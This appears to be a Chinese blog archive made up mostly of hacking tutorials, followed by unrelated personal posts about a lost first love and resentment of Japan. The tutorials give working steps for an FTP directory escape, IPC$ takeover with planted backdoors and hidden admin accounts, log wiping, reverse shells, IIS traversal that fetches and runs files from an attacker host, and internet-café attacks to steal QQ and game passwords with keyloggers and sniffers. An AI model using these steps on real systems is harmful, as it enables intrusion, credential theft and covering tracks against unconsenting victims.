FTP入侵

正文

利用伺服程式的缺陷入侵系统

  FTP入侵:wu-ftpd2.x版以前安全缺陷。
  wu-ftpd2.x是WashingtonUniversity(美国华盛顿大学)所研发出来的FTP伺服程式,广泛应用在各型UNIX主机上作为FTP伺服程式。它可以接受一般的用户签入,也提供以Anonymous或ftp为名的匿名签入以开放主机上的档案供大众Download用。其2.2版本以前有一个很严重的安全缺陷:一个匿名的使用者经由下列程序也可以取得一般使用者的权限进入系统磁碟:
  1.以任何一个FTPClient端程式连线到使用wu-ftpd2.x版以前架设的FTP站台。
  2.要求签入时,使用匿名帐号签入,但不要使用anonymous而使用FTP。
  3.在根目录下再次使用chdi/(cd/)命令,即可切换到一般系统目录而不只是公众目录。现在在此示范如何入侵网络上的一台please.hack.me主机,实例如下:(中文部分为注解)
  linux1:~#ftpplease.hack.me
  Connectedtoplease.hack.me
  220hackFTPserver(Versionwu-2.x(x)SunMay14:57:12CDT1993)ready.
  Name(linux1.twunix.org:root):ftp
  331Guestloginok,sendyourcompleteemailaddressaspassword.
  Password:
  230-Welcome,archiveuser!ThisisanexperimentalFTPserver.Ifhaveany
  230-unusualproblems,pleasereporthemviaemailtoroot@please
  230-Ifyoudohaveproblems,pleasetryusingadash(-)asthefirstcharacter
  230-ofyourpassword-thiswillturnoffthecontinuationmessagesthatmay
  230-beconfusingyourftpclient.
  230-
  230Guestloginok,accessrestrictionsapply.
  RemotesystemtypeisUNIX.
  Usingbinarymodetotransferfiles.
  ftp>ls-1一般匿名帐号进入后,先查看所在目录的内容。
  200PORTcommandsuccessful.
  150OpeningASCIImodedataconnectionfor/bin/ls.
  tota19
  drwxrwxr-x8rootwheel1024Sep1109:31.
  drwxrwxr-x8rootwheel1024Sep1109:31..
  drwxrwxr-x2rootwheel1024Sep1109:31bin
  drwxrwxr-x2rootwheel1024Sep1109:31etc
  drwxrwxr-x2rootwheel1024Dec31993incoming
  drwxrwxr-x2rootwheel1024Nov171993lib
  drwxrwxr-x2rootwheel1024Sep1109:31pub
  drwxrwxr-x3rootwheel1024Sep1109:31usr
  -rw-r–r–1rootroot312Aug11994welcome.msg
  226Transfercomplete.以一般匿名帐号进入后只能看到公众目录内容。
  ftp>pwd
  257"/"iscurrentdirectory.
  ftp>cd/虽然已经在根目录下,依然再次切换到/目录。
  250CWDcommandsuccessful.本来应该是要回应[无此目录]的(因为已经在最底层)但是依然可以继续切换。
  ftp>ls-1再次查验现在目录内容。
  200PORTcommandsuccessful.
  150OpeningASCIImodedataconnectionfor/bin/ls.
  total777
  drwxr-xr-x19rootroot1024ct608:58.
  drwxr-xr-x19rootroot1024ct608:58..
  drwxr-xr-x2rootbin2048Sep1117:31bin
  drwxr-xr-x2rootroot1024Sep1117:35boot
  drwxr-xr-x3rootroot2048Oct1400:03dev
  drwxr-xr-x9rootroot2048Oct1410:41etc
  drwxr-xr-x3rootroot1024Oct507:26ext
  drwxr-xr-x2rootroot1024Sep1109:42floppy
  drwxr-xr-x8rootroot1024Oct1111:52home
  drwxr-xr-x3rootroot1024Sep1117:27lib
  drwxr-xr-x2rootroot12288Sep1117:16lost+found
  drwxr-xr-x2rootroot1024Jul1013:23mnt
  dr-xr-xr-x5rootroot1408Oct408:03proc
  -rw——-1rootroot139424Sep2817:00quota.user
  drwxr-x-x3rootroot1024Sep2814:07root
  drwxr-xr-x2rootbin2048Sep1117:31sbin
  drwxr-xr-x2rootroot1024Sep1117:18shlib
  drwxrwxrwt3rootroot1024Oct1410:40tmp
  drwxr-xr-x24rootroot1024Jul81994usr
  drwxr-xr-x14rootroot1024Sep1117:32var
  -r———1rootroot596263Sep1117:33vmlinuz
  226Transfercomplete.已经变成一般系统目录了。
  ftp>
 
入侵原理解说:
  此一入侵是利用FTP公众匿名帐号anonymous,ftp其中后者的ftp正好与系统内定的FTP公众帐号名称相同,使得系统误以为ftp是一个已经登记的用户,而不是一个公众匿名帐号,而使其进入系统目录中。
  为什么会有这种现象发生呢?原来是FTP伺服程式将连线进来是使用者分为[匿名帐号]与[正式帐号]。如果是匿名帐号,则系统仅要求其输入自己的E-mail或是Ident资料当密码,就可以进入系统的/home/ftp目录中,而以/home/ftp当作此类使用者的根目录,这种用anonymous或是ftp当帐号匿名签入的使用者是没有办法切到系统目录中的(实际的/目录),再怎么下chdir/命令也只能到/home/ftp为止。
  而如果在/etc/password中登记有案的帐号,则以系统中实际的/为其根目录,此类使用者可以在其权限范围内浏览整个硬碟。
  而因为匿名帐号是以/home/ftp目录为起点,正好与ftp此一匿名帐号相同,故wu-ftpd2.x版以前的版本将会使用ftp签入的帐号视为一般User。(不过如果是用anonymous此一匿名帐号签入,就不会有这种情况了)
  使用ftp帐号并入侵到系统里面以后有什么好处呢?由于该入侵者已经可以完整浏览该硬碟,并享有一般User的权限,当然入侵者也可以进到/etc目录下,并读取passwd档案。如果该系统没有做shadow的话,那就大大方方地拿走passwd档案,然后回家利用类密码分析程式算出密码来。如果正好还破出root的密码的话,那就……嘿嘿~~~~
 
入侵防治方法:

  1.如果您的ftp伺服程式是wu-ftpd而且版本号低于2.4版,请尽快换到2.4版使用。
  2.将ftp帐号列入/ftp/ftpusers档案中,让匿名使用者只能利用anonymous此一匿名帐号签入。
  3.替系统安装ShadowPasswd。
  4.再次确认系统中没有叫做ftp或是anonymous的目录。
  5.改/etc/inetd.conf档案,关闭FTP服务。

网管和黑客都应知道的命令

网管和黑客都应知道的命令


  (与远程主机建立空管连接) net use file://IP/地址\ipc$ "" /use:""
  (以管理员身份登录远程主机) net use file://IP/地址\ipc$ "密码" /use:"Administrator"
  (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 file://IP/地址\admin$
  (查看远程主机时间) net time file://IP/地址
  (定时启动某个程序) at file://IP/地址 02:18 readme.exe
  (查看共享) net view file://IP/地址
  (查看netbios工作组列表) nbtsta* -* **地址
  (将远程主机C盘映射为自己的F盘) net use f: file://IP/地址\c$ ""/user:"Administrator"
  (这两条把自己增加到管理员组): net user 用户名 密码 /add
  net localgroup Administrators 用户名 /add
  (断开连接) net use file://IP/地址\ipc$ /delete
  扫尾:
  del C:\winnt\system32\logfiles\*.*
  del C:\winnt\ssytem32\config\*.evt
  del C:\winnt\system32\dtclog\*.*
  del C:\winnt\system32\*.log
  del C:\winnt\system32\*.txt
  del C:\winnt\*.txt
  del C:\winnt\*.log
  一、netsvc.exe
  下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
  netsvc /list file://IP/地址
  netsvc schedule file://IP/地址 /query
  netsvc file://IP/地址 schedule /start
  二、OpenTelnet.exe
  远程启动主机的Telnet服务,并绑定端口到7878,例如:
  OpenTelnet file://IP/地址 用户名 密码 1 7878
  然后就可以telnet到主机的7878端口,进入DOS方式下:
  telnet IP地址 7878     三、winshell.exe
  一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CM*>后,可打下面的命令:
  * *ath (查看winshell主程序的路径信息)
  b reBoot (重新启动机器)
  d shutDown (关闭机器)
  s Shell (执行后你就会看到可爱的“C:\>”)
  x eXit (退出本次登录会话,此命令并不终止winshell的运行)
  CMD> http://…/srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
  四、3389登陆器,GUI方式登录远程主机的
  五、elsave.exe
  事件日志清除工具
  elsave -s file://IP/地址 -l "application" -C
  elsave -s file://IP/地址 -l "system" -C
  elsave -s file://IP/地址 -l "security" -C
  执行后成功清除应用程序日志,系统日志,安全日志
  六、hbulot.exe
  开启win2kserver和winxp的3389服务
  hbulot [/r]
  使用/r表示安装完成后自动重起目标使设置生效。
  七、nc.exe(netcat.exe)
  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
  想要连接到某处: nc [-options] hostname port[s] [ports] …
  绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
  参数:
  -e prog 程序重定向,一旦连接,就执行 [危险!!]
  -g gateway source-routing hop point[s], up to 8
  -G num source-routing pointer: 4, 8, 12, …
  -h 帮助信息
  -i secs 延时的间隔
  -l 监听模式,用于入站连接
  -n 指定数字的IP地址,不能用hostname
  -o file 记录16进制的传输
  -p port 本地端口号
  -r 任意指定本地及远程端口
  -s addr 本地源地址
  -u UDP模式
  -v 详细输出——用两个-v可得到更详细的内容
  -w secs timeout的时间
  -z 将输入输出关掉——用于扫描时 八、TFTPD32.EXE
  把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
  http://ip/地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
  然后可以直接令文件运行:
  http://ip/地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名     九、prihack.exe是IIS的printer远程缓冲区溢出工具。
  idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
  一○、nti*.**e、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
  一、一 Xscan命令行运行参数说明:
  在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。
  1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
  xscan -file <主机列表文件名> <检测项目> [其他选项]
  其中<检测项目> 含义如下:
  -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
  -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
  -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
  -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
  -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
  [其他选项] 含义如下:
  -v: 显示详细扫描进度
  -p: 跳过Ping不通的主机
  -o: 跳过没有检测到开放端口的主机
  -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10

常见端口入侵

各种常见端口入侵

SQLScanPas*.**e 进行字典暴破(字典是关键)
最后 SQLTool*.**e入侵
=============================
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(小榕的注入软件)。

5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
======================================
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

6. 554端口
用real554.exe入侵。

7. 6129端口
用DameWare6129.exe入侵。

8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。

9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
  
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
  
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
  
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
  
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
  
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
  
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
  
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

网吧入侵

网吧入侵

  入侵的方法很多,但对网吧入侵最常用的方法是什么呢?首先,自动登陆。现在网吧一般都是win2000或者windows xp的机器,网管一般都把机子设置为自动登陆!这样我们开机进入系统的时候登陆窗口一闪而过!着时候如果我们findfas*.**e试图把登陆账号密码找出来是不会成功的!因为账号密码根本不在内存中,而findfas*.**e通过winlogon的PID号和正确的域名中,在内存寻找好段加了密的内存块(保存着加密过的登陆密码),然后对它进行解密,这样就能得到明文的密码。实际上自动登陆的账号密码都在注册表中。我们打开注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\这个目录下,AutoAdminLogon这一项的键值为1,表示自动登陆。为1的时候,打开控制面板的用户和密码,会发现需要密码前面的钩已经去掉了。DefaultUserName对应的键值就是登陆用户名,DefaultPassword对应的键值就是登陆密码。实际上海洋顶端木马2006就有着一功能,原理是一样的,不过因为权限的问题,不一定能读出来。这样,密码账号我们都找出来了。而且你要知道,一个网吧的自动登陆密码账号一般都是一样的,而且网管为了方便网虫上网一般把他们设置在管理员组,至少user组。知道了密码账号还愁入侵不了么?网吧机子的server服务一般是禁用的,那我们就不能用ipc入侵了。opentelnet.exe我们也用不了,因为着个也依赖ipc连接,dameware远程控制也不行,道理一样。我们可以用recton着个小巧实用的工具来开telnet,这个工具在win2000下面特别好使。
如图1。
开了telnet后,我们telnet上去,先在本机打开tftpd32.exe,再telnet下面telnet -i myip get 3721.exe c:\3721.exe,这样就把我们的木马3721.exe比如radmin传过去了。
如图2。再在telnet下面直接运行3721.exe就ok了。
    另一个方法就是ms04011漏洞,别以为着个漏洞已经过时了,在网吧这个漏洞还是相当普遍的,许多网吧的网管只会装游戏,重装系统,不重视着写漏洞,懒得打补丁!我们用DSScan扫描192.168.0.1-192.168.0.255,一般会你会很惊喜的。我们到用ms04011溢出工具溢出,一下子就得到了系统权限。
如图3.
    还有很多入侵方法,你可以把xscan搬出来扫描一下。很多菜鸟喜欢用啊D工具包来扫网吧的空口令,实际上这个工具扫用户账号密码很弱,以前我试过,我用上面第一种方法发现网吧都有一个密码为空的管理员账号,用啊D工具包只扫出几台机子有这个账号。我经常用我的最爱
闪电狐——火狐端口扫描器来扫一下网吧主机,第一服务器等。着个扫描器速度很快,扫1到10000端口也要不了几分钟。如果发现服务器开80断口,自然是看是不是架设了网站。再看网站十分有漏洞,想办法传个asp木马上去提升权限。如果发现电影服务器装了serv_u,而且你有了一个账号,可以尝试一下serv_u的溢出。
                                                  二.网吧牧马
在网吧安装木马最重要的是把它的还原破了,现在网吧的还原系统一般有3种,即还原卡,还原精灵,冰点还原精灵。硬盘还原卡其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序,屏蔽了
一些功能调用如AH=3,5等,在中断向量表中INT 13的SEG,OFFSET
描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码,
当你AH=2的时,它便会call原始INT 13地址来完成(商周)作.
只要找到原始INT 13入口便可以为所欲为.
具体过程如下:
开机过程按住F8键,进入纯dos环境, 注";"后为注释.
出现提示符c:,
键入c:\debug,
– a100
– xor ax,ax
– int 13
– int3
; 寻找原始的int 13入口.
然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx
,后面的指令为:mov dl,80 (练练眼力-。按q退出.
记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。
例如俺的得到的地址是F000:9A95
再次运行debug ,键入:
-e 0:4c 95 9A 00 F0 e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中.
-q
注: 填的时候要仔细,填错的话会死机。ok,破解完成.
这时在提示符c:\键入
c:\win
进入windows系统即可,那么这次你在windows系统中的一切(商周)作,随着下一次
的启动都会被还原卡存储起来。
这种办法大家都知道,不过操作起来也有点危险,弄不好启动不了。而且win2000没有dos环境,到底性不行呢?呵呵,我还没有
做这个危险的尝试。不过望上有很多关于破解还原卡的工具可以下载,到底什么工具最好使,大家自己测试。
至于还原卡,网上有密码读取器,不过着工具只能在win98下面使用。在win2k下面我们可以用winhex来破解,次方法很奏效,
应该是最好的办法。先随便输个错误的密码,弹出错误窗口后不动,用winhex查找主要内存,找到还原精灵,再搜索我们开始
输的错误密码。在错误密码的旁边应该就有正确的密码。我们输入正确的密码转存就行了。这里很简单,就不截图了!
   至于冰点还原,好像还没有破解办法,这个的确很厉害。不过他有个选项,就是重启多少次后不还原,没事你可以多重启
试一下,别把机子整坏了就行。
   破了还原后就装木马了。我们最好装键盘记录或密码截获木马,盗qq,游戏账号,邮箱账号等等。比如密码结巴等工具,也可以
把浏览器默认主页设置为你的网页木马。如果网吧的默认主页都是一样,而你有能力入侵了那个网站,在默认主页上挂马那更好!

                                      三.网吧嗅探。
   如果你想知道网吧某个mm的qq号,那你就用QQSniffer,Ver2005build5.5。也可以用xniffer,用于嗅探域网中或本机的pop.smtp.ftp等明文传输的tcp/ip协议密码。格式是 xsiff.exe -pass -hide -log pass.log  xsiff.exe -tcp -udp -asc -addr 192.168.1.1。如果你不喜欢着个,还有个密码监听器,密码监听器用于监听网页的密码,包括网页上的邮箱、论坛、聊天室等等。只需在一台电脑上运行,就可以监听局域网内任意一台电脑登录的账号和密码,并将密码显示、保存,或发送到用户指定的邮箱。我就经常有密码监听器2.4破解版在网吧监听别人
密码!当然网吧最适合dns欺骗!
如图3。
                                       四.端口转发。
   为了能随时随地控制网吧机器,在家也可以!我们最好来个端口转发。首先我们可以用fport.exe(这个工具在angelshell1.0包里面有),格式为fport 但是使用他可以不必安装后门,只需要普通的权限即可执行。网吧服务器一般是win2000server版的,我们趁管理员不注意,给他开3389。如果他的ip为192.168.0.1,我们就在他的命令行下执行fport.exe 3389 myip 9999,这里的myip可以是我们的一只有公网ip的肉鸡。我们再在公网ip的肉鸡上运行FportClient.exe着个是客户端。着样我们登陆公网ip的肉鸡的9999端口就进了网吧主机。在上面看第电影赶什么都行,不被发现就行了,我们动作轻点就行了。我们也可以给网吧主机装代理。就用htran2.4,SocksCap。在网吧主机命令行下上执行htran.exe -install (安装Socks5服务),htran.exe -start (启动Socks5服务),再执行"htran.exe -s -connect 共网肉鸡ip 3389。在自己的共网肉鸡上执行htran.exe -s -listen 3389 5200(监听端口).现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了网吧主机。我们也可以
用vidc来映射端口,这个和fport差不多就不多说了

初恋至纯

    前几天一直失眠,因为我去了高圆圆的网站。千万不要以为我的失眠是因为高圆圆,大错特错。
    两年前开始初恋,那些日子是我至今最怀念的时光。但生活总是太爱捉弄无知而有幸福的人,在升学的日子,我跟娇气分手了。当时的我很冷静,几乎没有任何因为恋情失败而应该有的情绪。记得当时我把全部身心都投入了学习。没有目标、没有计划,只是每天不停的背那些能让自己忘记娇气的东西。没过几天,那些背的东西也不能麻痹自己了,我就穷尽思维的做数学题。书上的做完了,就到网上搜索数学史上悬了几十、几百年没解决的问题。虽然我没有把那些很难很难的数学题完全做出来,但是直到现在我的笔记本上都留着当时的笔记。也算是我向数学难题进军的证明吧。其实这更是离不开的娇气的证据。
    我不是追星族,但我前几天去了高圆圆的网站。因为娇气的脸形跟高圆圆非常相象,我实在压抑不住心中的冲动,就去了这颗星的网站。其后的事情我不想熬述,几夜的失眠,到现在我都决得自己很没用!其实以前我并不知道高圆圆是谁。有一次,我将娇气的图片做成屏保送给朋友。朋友失声叫出“这不是高圆圆吗?”。我当时真瞢了,“谁是高圆圆?我不认识,这是娇气。我的初恋女友。”我在心里对自己说。就这样,我知道有一颗星跟娇气长得很像,或者娇气跟这颗星很像。我延续着对娇气的感情去了高的网站,或许是看了太多高圆圆的照片,那一夜我开始思念娇气,那一夜我开始失眠!
    以后的时间我的都在高的网站逗留,我看了太多高的图片。娇气跟她的差别太大了,娇气刚好18岁没有高那么女人味的身材。娇气有点黑,没有她白皙白净的皮肤。但我终究深爱着我的娇气,娇气跟高圆圆唯一相象的一点就是脸形。而我现在已经不知道娇气何去何从,所以我一再的逗留在高的网站。
    早恋是一个过程,但我陷的太深。幸福成了一种奢望,我该何去何从。

劣等民族

    实在无法放下心中的痛楚,今天7点起床,做了80个俯卧撑!很累,但我能坚持。以后每天多做几个,要一直增加到两百。日本人说我们是劣等民族,其它的我不敢妄下结论。但个人身体素质,我绝不服输!  
    其实这几天根本就没睡过多少时间。8月13日5个小时,8月14日3个小时,8月15日5个小时。但奇怪的是我根本就没有想打瞌睡的念头!看来我还能坚持,我得坚持。一刻不停的学习,累了可以看看那些日本人歧视中华民族的文章。没有想睡的念头,这是好事。只要到床上一躺就谁着了,这种感觉我太喜欢了! 
    我总是想起日本人施行的教育,也总爱把它跟中国的教育作比较。每次这样做我都会流很多泪水,我不是爱哭的人,我决得哭是没志气的表现。但即便这样,我的眼泪也还是不听从我的号令!但说句实话,今日的泪水总比明天的败绩好得多。 
    明天是未知,今天我得谨记“我没权利改变别人,但是我可以告诉别人。我能力有限,但我可以发动更多人。” 

劣等民族

  昨夜是我最伤心的一晚!在创网连问十几个人!居然没一个知道公历8月15是什么日子!难怪日本人说我们是劣等民族。我心在痛,如刀割般,铁与血在交汇。
    日本青年的父母很注重对他们的教育。因为当他们成年时,就要背负起振兴民族、昌盛国家的责任!他们在不同的国家游说,在不同的地方宣传!每一刻他们都在世界各地宣传日本文化,大一统文化!当我想得到他们的尊重时,得到的答复是“我为什么要尊重你,你们是劣等民族的子孙。”我的眼泪又在不由自主的往下掉,我实在不想在写了!中华民族不是劣等民族,这一代的麻木并不代表所有中国青年的麻木。这一代在玩耍,并不代表中国的未来会毁在这一代手上。我很佩服日本人在世界各地为他们的政府所做的贡献,他们将自己在世界各地生活时的经验和社会调查写成报告,递交日本政府。而这一切都是自发的,我不得不由衷的佩服,我决定在大学时自修日语。我也要到日本去,我也要做日本社会的调查报告!不能让日本人说我们是劣等民族!
    我在酬钱,准备开一家专门针对中日关系和日本社会文化的网站。最迟在今年,我一定省吃简用将网站办起来!反对购买日货,学习日本文化。
    我没有韩国青年“切指明志”的豪情,但我会一刻不停的学习,一刻不停的激励自己。永远不要忘记日本人的挑衅,永远不要忘记那句让我哭泣的话“我为什么要尊重你,你们是劣等民族的子孙。”。         han

今夜不失眠(转)

    我生长在东北的哈尔滨,虽然从小唱着"大刀向鬼子的头砍去……",听着历史老师很愤恨的叫日本人"倭寇"、"鬼子",看着诸如731部队之类的报道和展览;但这并不影响我儿时对日本的看法,记得小的时候,同学录上"最向往的地方"一栏,我填的都是"日本"。
  那个时候觉得日本的动画片很好看,日本的小电器好用,甚至连日本的忍者和剑道高手,都是我心中的偶像。小时候拿着木棍模仿日本人劈剑的经历,我现在都记忆犹新。渐渐的,人也长大了, 有机会听到见到更多关于日本的东西,这中间当然有那段不短的历史,有日本国内对中国的看法,有日本经济的强大,和时常能听到的"友好邻邦"、"一衣带水"之类的宣传。
  可以说,在相当长的一段时间里,我并没有对日本有任何心理上的戒备和敌意;甚至,可以说是有点谄媚的向往。我当然也听到过"南京大屠杀"、"731细菌部队"、"旅顺大屠杀"和数不清的日本人在侵略时的历史;但是,我始终认为,那些已过去了,记着就可以了,干吗要抱着不放哪?两国友好不是很好吗?这些和他们这一代日本人没关系啊……等等如是的想法。

  2000年,我从东北的哈尔滨来到了上海,异乡的生活,给了我更多的机会接触不同的人和事,也让我有机会能够更深的思考一些问题。
  刚来上海的时候,有人听到我是来自哈尔滨的,时常会问到:"你们恨日本吗?"。那时,我都会以东北人的身份告诉他:"东北人都恨日本,他们侵略过我们";但是让我说具体我恨他什么?我根本说不出来,因为在那时的我的印象里,我是没有任何情感的累积的,只是出于道义和理所应当的层面上才会说这些。

  直到那一天。

  那时2000年冬天的一个晚上。我和几个好朋友在复旦旁边的一个漫画pub(乐静宜开的漫画吧)过通宵。那个pub在上海算是小有名气的,里面都是日本的漫画和其他的书籍,氛围弄得很好。
  这时,旁边走过来一个服务生,头上系着头巾,很恭敬的在旁边问道:"先生,可以聊聊吗?"。我们高兴的欢迎了他,当然,第一句话是礼节性的问了一句"您是哪里人啊?",他的回答很巧妙:"我是哪里人不重要,我在哪里就是哪里人,你们觉得我是哪里人呐?",然后他用上海话问:"哪晓得伐?"。听到朋友说他是广东人,就用广东话说:"你知吾知嘎?",然后用北京话一样的北方音调的普通话对我说:"您说哪?"。由于他的相貌和举止,我们一致猜他是日本人,他不置可否,对我们笑笑说:"这个不重要,我问你们一个问题好吗?"。他向我们借了笔和纸,然后,很认真地看着我,说:"你是东北人,我问你一个地方你知道吗?"然后在纸上很流利地写下了两个很漂亮的汉字:"奉天";写好之后,他抬头看看我说:"这里本来可以做都城的,可惜……",我马上觉得来者不善,可能因为面对的是外国人所以激发了我的感情,我很正经的和他说:"先生,您写错了,现在已经没有叫做奉天的城市了,’奉天’现在叫’沈阳’,叫做’奉天’的那个年代,一去不复返了。"
  他笑笑说:"那可不一定"。
  然后他在纸上画了一张世界地图说:"这个就是世界,你们对世界有什么看法吗?没有,因为你们是不思进取的民族。我们不是,我们的目标不只是奉天,东北,甚至中国。我们的目标就是——",他用笔在地图上画了一个大圈,然后很有力量的说:"全世界!!!"
  我笑了笑说:"世界属于谁不是你们定义的,什么事情都有他的规律。你凭什么说中国人不进取?你凭什么瞧不起一个这么有文化底蕴的民族?"
  "你们总在谈文化,我很敬重中国的文化,我觉得我一辈子也不能完全理解其中的一点点内容,这也是我一直学习中国文化的原因,但是你们哪?你们中国人,自己的文化知道多少?甚至我可以说,中国人,懂中国的文化,绝对没有我们日本人懂得多。儒学的思想是什么?为什么孔孟会被尊奉到那么高的地位?你们谁能说出来?"
  "中庸、仁,这些就是儒学的精髓"。我将我当时仅有的有关中国文化的知识搬出来。我那时的心情相当复杂。是啊,他问更多哪?我还能知道了吗?我们这一代认真的又很少人对中国的文化感兴趣甚至研究过,一个连自己文化都不懂的人,怎么配和别人理论文化的问题啊?
  我们马上问了他很多关于中国的问题,看他是否真地对中国的文化有所了解,让我们吃惊的是:第一次大一统、唐代盛世、元清的少数民族统治、甚至"春天的故事",这所有的东西,他都能很清晰甚至很透彻地告诉我们其经过和影响。他自豪地说:"一个不研究自己文化的民族,就是落后和愚昧的!是被别人瞧不起的!"
  我马上回击:"你们日本人就被别人瞧得起吗?别忘了黄种人在美国是什么地位?"
  "你去过美国吗?你了解美国吗?如果没有,请不要妄加判断。我在美国生活过两年,我想,在美国,亚洲人如何,我应该比你有发言权。"
  我哑口。
  "有一次我去买首饰,选了好久,服务生态度都很生硬;而当我告诉她我是日本人的时候,他马上很恭敬的帮我选,还抱歉地说:’对不起,我还以为您是香港人呐’,这就是尊重,是你们永远享受不到的尊重。"
  "你当人家真的尊重你啊?还不是因为日本人的钱。"
  "就算是为了钱,怎么样?事实就是人们尊重日本人,不只是因为钱,更是因为日本强大,因为日本人的素质比中国人高。"
  "你凭什么说中国人素质低?你去过几个地方?"
  "我去过十几个省,绝对比你去过的地方多,让我说为什么,我不举别的地方,我现在所在的城市是上海,这算是你们中国最好的城市了,可是怎么样呢?人们像盲人一样根本不看红灯的过马路,乘坐交通工具的时候向发狂一样的挤来挤去、随地吐痰、晚辈在街上辱骂长辈,这些都是真的吧?"
  我又哑口,朋友接到说:"有些人是这样,但是不代表所有人是这样啊。我们深圳人就不会乱抢位子,乱穿马路。"
  "噢?是这样的吗?对不起,我没有去过深圳,如果有机会,我一定会去看看。"他的表情变得恭敬起来。这更接近我过去对日本人的看法。但是,这没有维持多久。
  "素质,什么叫素质?你们的孩子都被大人包在家里,生怕孩子吃苦。我小的时候,爸爸每天都让我四点起床去跑步,当时我很不理解,还有些恨他,可是现在,我感激我的爸爸,是因为这样的锻炼,使我形成了坚毅的意志,让我形成了日本人的精神。这么差的基础,怎么可能会有一个强大的民族? "
